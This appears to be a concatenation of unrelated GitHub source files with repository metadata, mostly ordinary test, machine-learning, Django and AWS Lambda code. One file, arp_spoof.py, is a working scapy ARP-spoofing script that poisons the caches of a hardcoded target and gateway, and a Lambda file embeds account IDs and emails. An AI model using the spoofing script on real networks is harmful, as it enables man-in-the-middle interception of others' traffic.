we could test how HTML rendering looks like when the boundaries of the page are reached. And here is a non-ascii char: \u015e\n', False, 'line-edit') ], } for class_name in cobertura2.classes(): assert differ.class_source(class_name) == \ expected_sources[class_name] def test_diff_total_misses(): from pycobertura.cobertura import CoberturaDiff cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml') cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml') differ = CoberturaDiff(cobertura1, cobertura2) assert differ.diff_total_misses() == 1 def test_diff_total_misses_by_class(): from pycobertura.cobertura import CoberturaDiff cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml') cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml') differ = CoberturaDiff(cobertura1, cobertura2) expected_sources = { 'dummy/__init__': 0, 'dummy/dummy': -2, 'dummy/dummy2': 1, 'dummy/dummy3': 2, } for class_name in cobertura2.classes(): assert differ.diff_total_misses(class_name) == \ expected_sources[class_name] def test_diff_line_rate(): from pycobertura.cobertura import CoberturaDiff cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml') cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml') differ = CoberturaDiff(cobertura1, cobertura2) assert differ.diff_line_rate() == 0.15000000000000002 def test_diff_line_rate_by_class(): from pycobertura.cobertura import CoberturaDiff cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml') cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml') differ = CoberturaDiff(cobertura1, cobertura2) expected_sources = { 'dummy/__init__': 0, 'dummy/dummy': 0.4, 'dummy/dummy2': -0.25, 'dummy/dummy3': 0.0, } for class_name in cobertura2.classes(): assert differ.diff_line_rate(class_name) == \ expected_sources[class_name] def test_diff_total_hits(): from pycobertura.cobertura import CoberturaDiff cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml') cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml') differ = CoberturaDiff(cobertura1, cobertura2) assert differ.diff_total_hits() == 3 def test_diff_total_hits_by_class(): from pycobertura.cobertura import CoberturaDiff cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml') cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml') differ = CoberturaDiff(cobertura1, cobertura2) expected_total_hits = { 'dummy/__init__': 0, 'dummy/dummy': 2, 'dummy/dummy2': 1, 'dummy/dummy3': 0, } for class_name in cobertura2.classes(): assert differ.diff_total_hits(class_name) == \ expected_total_hits[class_name] def test_diff__has_all_changes_covered__some_changed_code_is_still_uncovered(): from pycobertura.cobertura import Cobertura, CoberturaDiff cobertura1 = Cobertura('tests/dummy.zeroexit1/coverage.xml') cobertura2 = Cobertura('tests/dummy.zeroexit2/coverage.xml') differ = CoberturaDiff(cobertura1, cobertura2) assert differ.has_all_changes_covered() is False def test_diff__has_better_coverage(): from pycobertura.cobertura import Cobertura, CoberturaDiff cobertura1 = Cobertura('tests/dummy.zeroexit1/coverage.xml') cobertura2 = Cobertura('tests/dummy.zeroexit2/coverage.xml') differ = CoberturaDiff(cobertura1, cobertura2) assert differ.has_better_coverage() is True def test_diff__has_not_better_coverage(): from pycobertura.cobertura import Cobertura, CoberturaDiff cobertura1 = Cobertura('tests/dummy.zeroexit2/coverage.xml') cobertura2 = Cobertura('tests/dummy.zeroexit1/coverage.xml') differ = CoberturaDiff(cobertura1, cobertura2) assert differ.has_better_coverage() is False
0e1e424dd25965b3ba42e4afeeeb389beece8303
13561108c0c2866ed6dd09cff1c2c738f1b9fa29
/evalml/pipelines/components/estimators/classifiers/lightgbm_classifier.py
679acc55265a94e7e3c8a97d62f0a8fd9ae0946a
[ "BSD-3-Clause" ]
permissive
SarahCharlotte/evalml
ee94ad8c602d65e7870cc777014ec0bc306bac81
a4148e65e2ec6745c0dc7ed5a0d65401adcfdfae
refs/heads/main
2023-09-05T21:39:06.792121
2021-11-16T05:42:21
2021-11-16T05:42:21
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,308
py
"""LightGBM Classifier.""" import copy import numpy as np import pandas as pd from pandas.api.types import is_integer_dtype from sklearn.preprocessing import LabelEncoder, OrdinalEncoder from skopt.space import Integer, Real from evalml.model_family import ModelFamily from evalml.pipelines.components.estimators import Estimator from evalml.problem_types import ProblemTypes from evalml.utils import ( SEED_BOUNDS, _rename_column_names_to_numeric, import_or_raise, infer_feature_types, ) class LightGBMClassifier(Estimator): """LightGBM Classifier. Args: boosting_type (string): Type of boosting to use. Defaults to "gbdt". - 'gbdt' uses traditional Gradient Boosting Decision Tree - "dart", uses Dropouts meet Multiple Additive Regression Trees - "goss", uses Gradient-based One-Side Sampling - "rf", uses Random Forest learning_rate (float): Boosting learning rate. Defaults to 0.1. n_estimators (int): Number of boosted trees to fit. Defaults to 100. max_depth (int): Maximum tree depth for base learners, <=0 means no limit. Defaults to 0. num_leaves (int): Maximum tree leaves for base learners. Defaults to 31. min_child_samples (int): Minimum number of data needed in a child (leaf). Defaults to 20. bagging_fraction (float): LightGBM will randomly select a subset of features on each iteration (tree) without resampling if this is smaller than 1.0. For example, if set to 0.8, LightGBM will select 80% of features before training each tree. This can be used to speed up training and deal with overfitting. Defaults to 0.9. bagging_freq (int): Frequency for bagging. 0 means bagging is disabled. k means perform bagging at every k iteration. Every k-th iteration, LightGBM will randomly select bagging_fraction * 100 % of the data to use for the next k iterations. Defaults to 0. n_jobs (int or None): Number of threads to run in parallel. -1 uses all threads. Defaults to -1. random_seed (int): Seed for the random number generator. Defaults to 0. """ name = "LightGBM Classifier" hyperparameter_ranges = { "learning_rate": Real(0.000001, 1), "boosting_type": ["gbdt", "dart", "goss", "rf"], "n_estimators": Integer(10, 100), "max_depth": Integer(0, 10), "num_leaves": Integer(2, 100), "min_child_samples": Integer(1, 100), "bagging_fraction": Real(0.000001, 1), "bagging_freq": Integer(0, 1), } """{ "learning_rate": Real(0.000001, 1), "boosting_type": ["gbdt", "dart", "goss", "rf"], "n_estimators": Integer(10, 100), "max_depth": Integer(0, 10), "num_leaves": Integer(2, 100), "min_child_samples": Integer(1, 100), "bagging_fraction": Real(0.000001, 1), "bagging_freq": Integer(0, 1), }""" model_family = ModelFamily.LIGHTGBM """ModelFamily.LIGHTGBM""" supported_problem_types = [ ProblemTypes.BINARY, ProblemTypes.MULTICLASS, ProblemTypes.TIME_SERIES_BINARY, ProblemTypes.TIME_SERIES_MULTICLASS, ] """[ ProblemTypes.BINARY, ProblemTypes.MULTICLASS, ProblemTypes.TIME_SERIES_BINARY, ProblemTypes.TIME_SERIES_MULTICLASS, ]""" SEED_MIN = 0 SEED_MAX = SEED_BOUNDS.max_bound """SEED_BOUNDS.max_bound""" def __init__( self, boosting_type="gbdt", learning_rate=0.1, n_estimators=100, max_depth=0, num_leaves=31, min_child_samples=20, bagging_fraction=0.9, bagging_freq=0, n_jobs=-1, random_seed=0, **kwargs, ): parameters = { "boosting_type": boosting_type, "learning_rate": learning_rate, "n_estimators": n_estimators, "max_depth": max_depth, "num_leaves": num_leaves, "min_child_samples": min_child_samples, "n_jobs": n_jobs, "bagging_freq": bagging_freq, "bagging_fraction": bagging_fraction, } parameters.update(kwargs) lg_parameters = copy.copy(parameters) # when boosting type is random forest (rf), LightGBM requires bagging_freq == 1 and 0 < bagging_fraction < 1.0 if boosting_type == "rf": lg_parameters["bagging_freq"] = 1 # when boosting type is goss, LightGBM requires bagging_fraction == 1 elif boosting_type == "goss": lg_parameters["bagging_fraction"] = 1 # avoid lightgbm warnings having to do with parameter aliases if ( lg_parameters["bagging_freq"] is not None or lg_parameters["bagging_fraction"] is not None ): lg_parameters.update({"subsample": None, "subsample_freq": None}) lgbm_error_msg = ( "LightGBM is not installed. Please install using `pip install lightgbm`." ) lgbm = import_or_raise("lightgbm", error_msg=lgbm_error_msg) self._ordinal_encoder = None self._label_encoder = None lgbm_classifier = lgbm.sklearn.LGBMClassifier( random_state=random_seed, **lg_parameters ) super().__init__( parameters=parameters, component_obj=lgbm_classifier, random_seed=random_seed, ) def _encode_categories(self, X, fit=False): """Encodes each categorical feature using ordinal encoding.""" X = infer_feature_types(X) cat_cols = list(X.ww.select("category", return_schema=True).columns) if fit: self.input_feature_names = list(X.columns) X_encoded = _rename_column_names_to_numeric(X) rename_cols_dict = dict(zip(X.columns, X_encoded.columns)) cat_cols = [rename_cols_dict[col] for col in cat_cols] if len(cat_cols) == 0: return X_encoded if fit: self._ordinal_encoder = OrdinalEncoder() encoder_output = self._ordinal_encoder.fit_transform(X_encoded[cat_cols]) else: encoder_output = self._ordinal_encoder.transform(X_encoded[cat_cols]) X_encoded[cat_cols] = pd.DataFrame(encoder_output) X_encoded[cat_cols] = X_encoded[cat_cols].astype("category") return X_encoded def _encode_labels(self, y): y_encoded = infer_feature_types(y) # change only if dtype isn't int if not is_integer_dtype(y_encoded): self._label_encoder = LabelEncoder() y_encoded = pd.Series( self._label_encoder.fit_transform(y_encoded), dtype="int64" ) return y_encoded def fit(self, X, y=None): """Fits LightGBM classifier component to data. Args: X (pd.DataFrame): The input training data of shape [n_samples, n_features]. y (pd.Series): The target training data of length [n_samples]. Returns: self """ X = infer_feature_types(X) X_encoded = self._encode_categories(X, fit=True) y_encoded = self._encode_labels(y) self._component_obj.fit(X_encoded, y_encoded) return self def predict(self, X): """Make predictions using the fitted LightGBM classifier. Args: X (pd.DataFrame): Data of shape [n_samples, n_features]. Returns: pd.DataFrame: Predicted values. """ X_encoded = self._encode_categories(X) predictions = super().predict(X_encoded) if not self._label_encoder: return predictions predictions = pd.Series( self._label_encoder.inverse_transform(predictions.astype(np.int64)), index=predictions.index, ) return infer_feature_types(predictions) def predict_proba(self, X): """Make prediction probabilities using the fitted LightGBM classifier. Args: X (pd.DataFrame): Data of shape [n_samples, n_features]. Returns: pd.DataFrame: Predicted probability values. """ X_encoded = self._encode_categories(X) return super().predict_proba(X_encoded)
036edbdcac4e99c218d6e3166e64c1c348592b2c
3d41d1f41277dba3ef7875be3d49d2a22823a17b
/Virago/assembly/pipeline/3_test-provisioning/testProvision.py
8a362099ed9fe3beca1deea81b4e7a617faa8b5f
[]
no_license
AgnihotriShivam/Automation-lambda
e6f7a6cfc16026776240042c79d3e5c9ea845ffb
45885485096f9468958b07e659ab1f52423104bb
refs/heads/master
2022-11-17T06:47:21.409726
2020-07-18T07:44:01
2020-07-18T07:44:01
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,354
py
import json import boto3 import traceback payload = { "accountemail": "gabor.hasenfrasz@t-systems", "accountid": "787043465971", "securityemail": "[email protected]", "username": "A11336167", "accountname": "baseline", "accountcreate": { "CreateAccountStatus": { "AccountId": "787043465971", "State": "SUCCEEDED" } } } def lambda_handler(event, context): try: print("EVENT DATA:\n") print(event) print("-------------\n") job_id = event['CodePipeline.job']['id'] job_data = event['CodePipeline.job']['data'] print("JOB DATA:") print(job_data) params = json.loads(job_data['actionConfiguration']['configuration']['UserParameters']) branchname = params['branchname'] code_pipeline = boto3.client('codepipeline') lambdaclient = boto3.client('lambda') sfn = boto3.client('stepfunctions') if 'continuationToken' in job_data: print("ContinuationToken received") print(job_data['continuationToken']) conttoken = json.loads(job_data['continuationToken']) execArn = conttoken['executionArn'] sfnstatus = sfn.describe_execution(executionArn=execArn) if (sfnstatus['status'] == 'SUCCEEDED'): print("Status succeeded") code_pipeline.put_job_success_result(jobId=job_id) return "Complete." elif (sfnstatus['status'] == 'RUNNING'): print("Status is running") continuation_token = json.dumps({'executionArn': execArn}) code_pipeline.put_job_success_result(jobId=job_id, continuationToken=continuation_token) else: code_pipeline.put_job_failure_result(jobId=job_id, failureDetails={'type': 'JobFailed', 'message' : 'Failed'}) else: response = lambdaclient.invoke(FunctionName='deployProvision-{}'.format(branchname), Payload=json.dumps(payload) ) returnfromlambda = json.loads(response['Payload'].read()) continuation_token = json.dumps({'executionArn': returnfromlambda['executionArn']}) code_pipeline.put_job_success_result(jobId=job_id, continuationToken=continuation_token) except Exception as e: print('Function failed due to exception.') print(e) traceback.print_exc() put_job_failure(job_id, 'Function exception: ' + str(e))
6021f99450da92349ed6322671a065a456b44615
6dfc2281e1afad370cc30ca103fed6f3a32ac9f0
/arp_spoof.py
f39efa2815f0e54982199ba45dcb504a400086ea
[]
no_license
iw4p/arp-spoof
a6fa2de1208ce35f6415d2e6db17b005c7c54d8f
b437cb3498166fd2f07739200df81072ed7422dd
refs/heads/master
2020-06-21T22:48:15.899138
2019-07-18T13:45:04
2019-07-18T13:45:04
197,570,428
0
0
null
null
null
null
UTF-8
Python
false
false
1,292
py
#!/usr/bin/env python import scapy.all as scapy import time import sys def get_mac(ip): arp_request = scapy.ARP(pdst=ip) broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") arp_request_broadcast = broadcast/arp_request answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] return answered_list[0][1].hwsrc def spoof(target_ip, spoof_ip): target_mac = get_mac(target_ip) packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) scapy.send(packet, verbose=False) def restore(destination_ip, source_ip): destination_mac = get_mac(destination_ip) source_mac = get_mac(source_ip) packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac) scapy.send(packet, count=4, verbose=False) target_ip = "192.168.1.5" gateway_ip = "192.168.1.1" try: counter = 0 while True: spoof(target_ip, gateway_ip) spoof(gateway_ip, target_ip) counter = counter + 2 print("\r[+] Packets sent: " + str(counter)), sys.stdout.flush() time.sleep(2) except KeyboardInterrupt: print("\n[+] Detected CTRL + C ... Resetting ARP tables ... Please wait.\n") restore(target_ip, gateway_ip) restore(gateway_ip, target_ip)
9dd25c3a195a803e69626ee77d0394f1d40fc0a5
ff41e6f4559344143306b564f620aa0b3e96e85e
/venv/Scripts/pip3-script.py
fddcf460b92e381a0c46452f3b396f02aef6b5a0
[]
no_license
xiongjianguo12138/23_designMode
5c3ed42c75f0662014a8be084af31df2b58d0871
b05188328e418cf30dd9f3d5ebd71880ed52f0cf
refs/heads/master
2022-10-11T09:24:36.224052
2020-06-09T09:31:12
2020-06-09T09:31:12
270,936,974
0
0
null
null
null
null
GB18030
Python
false
false
414
py
#!C:\NLP\23种设计模式python版本\venv\Scripts\python.exe -x # EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3' __requires__ = 'pip==10.0.1' import re import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit( load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')() )
9d9cc136d3e694df1c96895abfb88c968265ad96
d7a4701e18be0f38820f5c15d80099fda6385f9f
/ABC103/C.py
a6bbebcf304df245df79b6b1970d55da63b3c38c
[]
no_license
shiki7/Atcoder
979a6f0eeb65f3704ea20a949940a0d5e3434579
c215c02d3bfe1e9d68846095b1bd706bd4557dd0
refs/heads/master
2022-05-21T16:59:01.529489
2022-04-29T11:26:42
2022-04-29T11:26:42
201,536,692
0
0
null
null
null
null
UTF-8
Python
false
false
245
py
import fractions N = int(input()) a = list(map(int, input().split())) # 最小公倍数 lcm = a[0] for i in range(1, N): lcm = lcm * a[i] // fractions.gcd(lcm, a[i]) total = 0 for i in range(N): total += (lcm - 1) % a[i] print(total)
29d7ffdf4a998f64def4b939c701236cfe7f594e
14ed14241eb5baba1f4702a4f79f3ff37c9ee86d
/ppa/editorial/migrations/0001_initial.py
02cf0d4f0c16a04245f1f18f14cdb7111da373a8
[ "Apache-2.0" ]
permissive
vineetbansal/ppa-django
491ac7916a4060558c2f4d6d7ecafc0079d8091a
67469f63195981609aed8ca5247e7c04b23a5236
refs/heads/master
2020-05-25T06:52:31.859162
2019-05-09T15:44:39
2019-05-09T15:44:39
187,672,561
1
0
null
2019-05-20T15:59:44
2019-05-20T15:59:44
null
UTF-8
Python
false
false
1,661
py
# -*- coding: utf-8 -*- # Generated by Django 1.11.12 on 2018-11-01 19:15 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion import wagtail.core.blocks import wagtail.core.fields import wagtail.images.blocks class Migration(migrations.Migration): initial = True dependencies = [ ('wagtailcore', '0040_page_draft_title'), ] operations = [ migrations.CreateModel( name='EditorialIndexPage', fields=[ ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')), ('intro', wagtail.core.fields.RichTextField(blank=True)), ], options={ 'abstract': False, }, bases=('wagtailcore.page',), ), migrations.CreateModel( name='EditorialPage', fields=[ ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')), ('date', models.DateField(verbose_name='Post date')), ('body', wagtail.core.fields.StreamField([('heading', wagtail.core.blocks.RichTextBlock(classname='full title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock())])), ], options={ 'abstract': False, }, bases=('wagtailcore.page',), ), ]
cfbb5ed150549c9c2ccea6f9d1dd5a710af86a7e
def900e7c5cfd534a19aff3411fe350e3e783e48
/manage.py
76baf737338721c8745c91abe4e6000e40d864be
[]
no_license
mishi1605/Ps_Project
add0cf2dc5ba66a5c313d3f24253098b5091fce7
40f9cd7c5d3838380e1bd8894d78f4292212f9b1
refs/heads/master
2022-12-22T07:15:50.858507
2020-09-29T09:35:42
2020-09-29T09:35:42
298,335,687
0
4
null
2020-09-29T09:35:43
2020-09-24T16:32:10
Python
UTF-8
Python
false
false
806
py
#!/usr/bin/env python import os import sys if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "linux_Ps.settings") try: from django.core.management import execute_from_command_line except ImportError: # The above import may fail for some other reason. Ensure that the # issue is really that Django is missing to avoid masking other # exceptions on Python 2. try: import django except ImportError: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) raise execute_from_command_line(sys.argv)
2d49765703150d90fa46324333407915d716c47a
487ed703bdfa86218de81490ac2829618627df8c
/CPUCode/example_time.py
40fb5abe6d7cbb3f479e66ad086c6099dcd8dd92
[]
no_license
thesps/MaxBDT
9b10cbc334db49794e5fdab7cb14e8bd20101a8e
ea2e459009fb2ec59cf49876e004eff8e225368e
refs/heads/master
2021-01-20T07:37:58.146267
2017-06-15T11:29:58
2017-06-15T11:29:58
90,022,434
3
0
null
null
null
null
UTF-8
Python
false
false
1,256
py
import timeit setup=''' from sklearn.datasets import make_moons from sklearn.externals import joblib from sklearn.ensemble import GradientBoostingClassifier from sklearn.model_selection import train_test_split import bitstring as bs import numpy as np from DFEBDTGalava import DFEBDTGalava import matplotlib.pyplot as plt from matplotlib.colors import ListedColormap from itertools import chain, izip X, y = make_moons(noise=0.3, random_state=0) bdt = joblib.load('bdt.pkl') X_train, X_test, y_train, y_test =\ train_test_split(X, y, test_size=.4, random_state=42) # Make a mesh of features n = 128 x_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5 y_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5 dx = (x_max - x_min) / n dy = (y_max - y_min) / n xx, yy = np.meshgrid(np.arange(x_min, x_max, dx), np.arange(y_min, y_max, dy)) dfedata = (np.array(list(chain.from_iterable(izip(xx.ravel(), yy.ravel())))) * 2**24).astype('int').tolist() ''' # Convert features to fixed point format and run on DFE print timeit.timeit("DFEBDTGalava(n * n, dfedata)", setup=setup, number=1) # Run on CPU print timeit.timeit('bdt.decision_function(np.c_[xx.ravel(), yy.ravel()])', setup=setup, number=1) #Z_CPU = Z_CPU.reshape(xx.shape)
10df5d952139b06e5b3632ceab4ce66129d476a5
fdcd1058df2e42ce9a6c7a38b76757997f53cb2a
/mute/widget/window.py
7fd3d172be4eabe8ee46965a1f4eb52aefaebca4
[ "MIT" ]
permissive
LZJ861124/mute
afb12d516ae1a4106079b51999dd0aa484618b07
f278d9cd2e9c1a4551d5ecdffde919d22ab2f6bb
refs/heads/master
2020-05-26T09:41:57.238217
2019-05-23T08:19:16
2019-05-23T08:19:16
188,191,427
0
0
null
null
null
null
UTF-8
Python
false
false
2,515
py
from __future__ import annotations from const.color import Color from container.container import Container from event.event import Event from viewport.viewport import Viewport from logcat.logcat import LogCat class Window(Container): @LogCat.log_func def __init__( self, x: int, y:int, width: int, height: int, caption: str = None ): super().__init__(x, y, width, height) self._caption = caption self._focus = None self._win = Viewport(width, height) self._win.move_to(x, y) self._modal = False self.set_background(Color.TEXT) self.on(Event.CLICK, self._on_click) self.on(Event.KEY_PRESSED, self._on_key_pressed) self.on(Event.PAINT, self._on_paint) @LogCat.log_func def move(self, off_x: int, off_y: int) -> Window: self._win.move(off_x, off_y) @LogCat.log_func def set_background(self, color) -> Window: self._win.set_background(color) return self @LogCat.log_func def set_content(self, content) -> Window: self._content = content return self @LogCat.log_func def set_caption(self, caption: str) -> Window: self._caption = caption return self @LogCat.log_func def _on_any(self, e: Event) -> None: if self._focus: self._focus.on_event(e) @LogCat.log_func def _on_click(self, e: Event, x: int, y: int) -> bool: for element in self.elements: if element.contains(x - self.x, y - self.y): Event.trigger( Event(Event.CLICK, element, x=x, y=y) ) if element.focusable: self._focus = element break return False @LogCat.log_func def _on_key_pressed(self, e: Event, key: str) -> None: if self._focus: self._focus.on_event(e) @LogCat.log_func def _on_paint(self, e: Event) -> None: ( self._win .border() .print_text(1, 0, f'┨ {self._caption} ┠') .refresh() ) for element in self.elements: element.paint(self._win) if self._focus: self._focus.paint(self._win) @property def focused(self) -> bool: return self._focused @property def modal(self) -> bool: return self._modal @property def win(self) -> Viewport: return self._win # window.py
228ccebb01f96ce3f3a82bbfb49168f6ae0a1d89
592498a0e22897dcc460c165b4c330b94808b714
/1000번/1931_회의실 배정(list index).py
306276f60d04bd7a71fc07003a9d4cca7c1c092d
[]
no_license
atom015/py_boj
abb3850469b39d0004f996e04aa7aa449b71b1d6
42b737c7c9d7ec59d8abedf2918e4ab4c86cb01d
refs/heads/master
2022-12-18T08:14:51.277802
2020-09-24T15:44:52
2020-09-24T15:44:52
179,933,927
0
0
null
null
null
null
UTF-8
Python
false
false
243
py
n = int(input()) arr = [] for i in range(n): arr.append(list(map(int,input().split()))) arr.sort(key=lambda x:(x[1],x[0])) cnt = 1 e = arr[0][1] for i in range(1,n): if e <= arr[i][0]: e = arr[i][1] cnt += 1 print(cnt)
917631a72394423d02550f505bf79edf580b3671
919b0ed2859ae07766d8858f29e2d1a28de5156e
/Master/IoT/IoT_Project/collector/coap_show_data.py
06aedfee9ba1b98a967395ee153dd32d5912a0ab
[]
no_license
ImBadnick/University
0b94f370e5a24e35b2c428d80e94684eea5141ce
a2da8900be57a63abfa2ab7b1ef83d5da674e225
refs/heads/main
2023-06-26T18:04:47.057041
2023-06-19T10:40:20
2023-06-19T10:40:20
322,025,101
18
0
null
null
null
null
UTF-8
Python
false
false
829
py
from database import Database import tabulate import time def show_coap_data(): db = Database() connection = db.connect_db() while(1): try: with connection.cursor() as new_cursor: sql = "SELECT * FROM `coap`" new_cursor.execute(sql) results = new_cursor.fetchall() header = results[0].keys() rows = [x.values() for x in results] print(tabulate.tabulate(rows, header, tablefmt='grid')) print("\n\n\n") print("----------------------------------------------------------------------------------------------------------") print("\n\n\n") time.sleep(5) except KeyboardInterrupt: break if __name__ == '__main__': show_coap_data()
e1f219988d543635c72c5833f63c6c07c035bffe
b0fa6339bc422c1fcf84d9bfff054d56c793ef4a
/core/migrations/0005_auto_20210716_1638.py
6f41171e0fccf878a130376d50b10fe4659723fd
[]
no_license
Hasmandeep/Ecommerce_Website
f9079df7e9560816a7779794360f5723b7c6f610
d30e4b722b6ac8c0f6a18886f298401a8478fbf3
refs/heads/main
2023-06-17T06:12:41.134463
2021-07-17T08:21:26
2021-07-17T08:21:26
378,190,329
0
0
null
null
null
null
UTF-8
Python
false
false
378
py
# Generated by Django 3.1 on 2021-07-16 11:08 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('core', '0004_auto_20210716_1628'), ] operations = [ migrations.AlterField( model_name='item', name='image', field=models.ImageField(upload_to=''), ), ]
2cf0f4a3cf555d0409849d7937cf0bf4e4155f09
91d2e84b7f569e7338ade987e241fc0b0ae62776
/App_Order/urls.py
41c6ba0f8abc36a0a9651b4f1800a8030f389d33
[]
no_license
Zahed75/Ecommerce_Project
1965d61b0a84ebbd6d23ccdd0d557c1cc9416195
a9adcf9458c48f769507ac22f8e20d24c64ea244
refs/heads/main
2023-04-17T10:03:45.528529
2021-05-06T13:24:25
2021-05-06T13:24:25
364,914,248
1
0
null
null
null
null
UTF-8
Python
false
false
398
py
from django.urls import path from App_Order import views app_name='App_Order' urlpatterns = [ path('add/<pk>/', views.add_to_cart, name="add"), path('remove/<pk>/', views.remove_from_cart, name="remove"), path('cart/', views.cart_view, name="cart"), path('increase/<pk>/', views.increase_cart, name="increase"), path('decrease/<pk>/', views.decrease_cart, name="decrease"), ]
9cf1e1dd38cfbb716cd9050a494f1b58d3d05316
4d84947c6bdbf94e4f50b5da6e232bbd02ae8fc3
/rmaker_admin_lib/exceptions.py
62bbe4595b465fa61e6f7e63ec31224e169d26b4
[]
no_license
isabella232/esp-rainmaker-admin-cli
c7921fe4bbc2f47ec8aee25b54c10b2e54e200a4
818eb68f269c73db9b687ca7b7027a076ea62997
refs/heads/master
2023-08-20T12:27:34.439293
2021-10-28T06:26:28
2021-10-28T06:26:28
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,315
py
# Copyright 2020 Espressif Systems (Shanghai) PTE LTD # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. class NetworkError(Exception): """ Raised when internet connection is not available """ def __str__(self): return ('Could not connect. ' 'Please check your Internet connection.') class RequestTimeoutError(Exception): """ Raised when HTTP Request times out """ def __str__(self): return ('HTTP Request timed out. ' 'Please check your Internet connection.') class InvalidJSONError(Exception): """ Raised for invalid JSON input """ def __str__(self): return 'Invalid JSON received.' class SSLError(Exception): """ Raised when invalid SSL certificate is passed """ def __str__(self): return 'Unable to verify SSL certificate.' class FileError(Exception): """ Raised when an error occurred during file operations """ def __init__(self, err_str): self.err_str = err_str def __str__(self): return '{}'.format(self.err_str) class CLIError(Exception): """ Raised when an error occurred during cli operations """ def __init__(self, err_str): self.err_str = err_str def __str__(self): return '{}'.format(self.err_str) class InvalidConfigError(Exception): """ Raised for invalid configuration """ def __str__(self): return 'Invalid configuration. Please login again.' class InvalidApiVersionError(Exception): """ Raised when current API version is not supported """ def __str__(self): return 'API Version not supported. Please upgrade ESP Rainmaker CLI.' class ExpiredSessionError(Exception): """ Raised when user session expires """ def __str__(self): return 'User session is expired. Please login again.'
8e2fda0d178cdd1a43694f501f42772972bc6262
ff950f6c75d763d0b5a2af21dbac0e4c48daaec9
/server/mediastream/migrations/0011_auto_20170428_1736.py
34d6b34b2889258f5a738ce3f5ad406ce3d56540
[ "BSD-3-Clause" ]
permissive
rogerbassons/media-stream
24f860e264c6bbbc0dec8c4100feea7216c780c7
6ef4811d04a681015834d6e8d302fab1a76752cc
refs/heads/master
2021-09-13T18:20:20.848428
2018-05-02T21:51:46
2018-05-02T21:51:46
86,855,638
0
0
null
null
null
null
UTF-8
Python
false
false
615
py
# -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-04-28 17:36 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('mediastream', '0010_auto_20170421_1938'), ] operations = [ migrations.AddField( model_name='video', name='enabled', field=models.BooleanField(default=False), ), migrations.AlterField( model_name='video', name='numberviews', field=models.BigIntegerField(default=0), ), ]
12de3c32d1859fe9166894147a5851c47025412f
e2ffd61970da024cbb4e6fceb6588f75adfe030c
/authapp/models.py
7e5a48cab23e9d580b9aa2db846cea1013af26ab
[]
no_license
MariaAfanaseva/Django
20a46a2dc574d008b7033ecc66bcd4e276f193d8
81fb0b89dcec723c23f26f14927fc845f7d29dc0
refs/heads/master
2022-12-15T11:35:12.609063
2021-02-05T10:01:17
2021-02-05T10:01:17
177,652,266
0
1
null
2022-12-08T05:35:10
2019-03-25T19:36:58
JavaScript
UTF-8
Python
false
false
1,923
py
from django.db import models from django.contrib.auth.models import AbstractUser from django.utils.timezone import now from datetime import timedelta from django.db.models.signals import post_save from django.dispatch import receiver from shop.storage_backends import MediaStorage def get_activation_key_time(): return now() + timedelta(hours=48) class ShopUser(AbstractUser): avatar = models.ImageField(upload_to='users_avatars', storage=MediaStorage(), blank=True) age = models.PositiveIntegerField(verbose_name='age', null=True) is_active = models.BooleanField(verbose_name='Active', default=True) email = models.EmailField(verbose_name='Email', unique=True) class UserActivation(models.Model): user = models.OneToOneField(ShopUser, on_delete=models.CASCADE, primary_key=True) activation_key = models.CharField(max_length=128, blank=True) activation_key_expires = models.DateTimeField(default=get_activation_key_time) def is_activation_key_expired(self): if now() <= self.activation_key_expires: return False else: return True class ShopUserProfile(models.Model): MALE = 'M' FEMALE = 'W' GENDER_CHOICES = ( (MALE, 'Male'), (FEMALE, 'Female'), ) user = models.OneToOneField(ShopUser, primary_key=True, on_delete=models.CASCADE) tags = models.CharField(verbose_name='Tags', max_length=128, blank=True) aboutMe = models.TextField(verbose_name='About You', max_length=512, blank=True) gender = models.CharField(verbose_name='Gender', max_length=1, choices=GENDER_CHOICES, blank=True) @receiver(post_save, sender=ShopUser) def create_user_profile(sender, instance, created, **kwargs): if created: ShopUserProfile.objects.create(user=instance) # create form else: 